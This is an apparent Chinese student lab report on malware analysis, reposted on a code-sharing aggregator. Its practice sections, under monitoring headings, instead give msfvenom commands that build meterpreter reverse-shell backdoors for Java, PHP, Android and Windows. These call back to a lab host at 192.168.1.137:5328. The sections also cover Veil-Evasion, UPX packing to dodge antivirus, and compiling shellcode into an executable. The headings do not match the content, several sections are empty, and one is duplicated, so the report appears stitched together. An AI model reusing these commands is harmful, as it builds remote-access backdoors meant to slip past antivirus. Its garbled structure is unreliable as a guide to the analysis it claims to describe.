码迷,mamicode.com
首页 > 其他好文 > 详细

Exp4 恶意代码分析

时间:2020-04-19 17:35:24      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:ip访问   shellcode   事件   code   显示文件   sha   帮助   explore   -o   

目录

一、实验目标

1、是监控你自己系统的运行状态,看有没有可疑的程序在运行。
2、分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。
3、假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质。

二、思考题

(一)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。

1、使用一些工具帮助自己监测系统,可以实时监控电脑上的端口信息,如果某个进程启动的时候连接了一些看起来很可疑的端口,就可以进一步进行分析。
2、使用windows自带的schtasks指令设置一个计划任务,每隔一定的时间对主机的联网记录等进行记录,如果自己的电脑没有联网的情况下出现了ip访问记录就可以进一步分析了。
3、通过sysmon监控计算机中的重要操作,可以在事件查看器中找到相关日志进行查看。

(二)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。

1、利用wireshark动态分析程序动向,监视其与主机进行的通信过程。
2、利用systracer工具分析恶意软件。
3、利用PE explorer工具对程序调用库等信息进行分析查看,还可以对其反汇编。

三、实践过程

(一)使用schtasks指令监控系统

1、C盘建立一个netstatlog.bat文件,用来将记录的联网结果格式化输出到netstatlog.txt文件中
netstatlog.bat:

date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt

2、在CMD下,使用schtasks /create /TN netstat5303 /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"命令创建计划任务netstat5303

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor_java.jar

图jar
3、生成php文件,并用VirusTotal进行扫描

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor.php

图php
4、生成apk文件,并用VirusTotal进行扫描

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 R> 5328_backdoor.apk

图apk

(二)使用sysmon工具监控系统

安装veil-evasion的时候照着Veil-Evasion下载、安装、使用教程上的步骤安装还算比较顺利,就是真的好慢,装了n个小时。
图Veli安装
图Veli1

1、启动evail-evasion
图启动

2、设置好回连的IP地址和端口号后,生成后门文件

3、用VirusTotal进行扫描
图Veil扫描

(三)使用VirusTotal分析恶意软件

1、对(一)1中的5328_backdoor.exe进行加壳

upx 5328_backdoor.exe -o 5328_backdoor_upx.exe

图upx(额,显示文件太小)

2、对(一)1中的met-encoded10.exe进行加壳

upx met-encoded10.exe -o met-encoded10_upx.exe

图upx1(加壳成功)

3、用VirusTotal进行扫描
图upx扫描(发现加壳之后被查出的概率增加了【捂脸】)

(四)使用Process Monitor分析恶意软件

1、在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=5328 -f c生成一个c语言格式的Shellcode数组
图生成Shellcod

2、创建一个C文件:shellcode_5328.c,将上面生成的数组copy到该文件下,并加入一个主函数
图c文件

3、使用i686-w64-mingw32-g++ shellcode_5328.c -o shellcode_5328_backdoor.exe命令将该C语言代码shellcode_5328.c转换为一个可在64位windows系统下操作的可执行文件shellcode_5328_backdoor.exe
图转化

4、用VirusTotal进行扫描
图shellcode扫描

5、将可执行文件放到主机上检测
图主机shellcode检测(可以发现这个文件刚放到主机上,就立即被查杀了)

(五)使用Process Explorer分析恶意软件

(六)使用PEiD分析恶意软件

(七)使用PEiD分析恶意软件

四、实践总结与体会

五、参考资料

免杀原理与实践
杀毒软件工作原理 及 现在主要杀毒技术
Veil-Evasion下载、安装、使用教程
kali安装veil和apt基本命令

Exp4 恶意代码分析

标签:ip访问   shellcode   事件   code   显示文件   sha   帮助   explore   -o   

原文地址:https://www.cnblogs.com/seven-moon/p/12732170.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!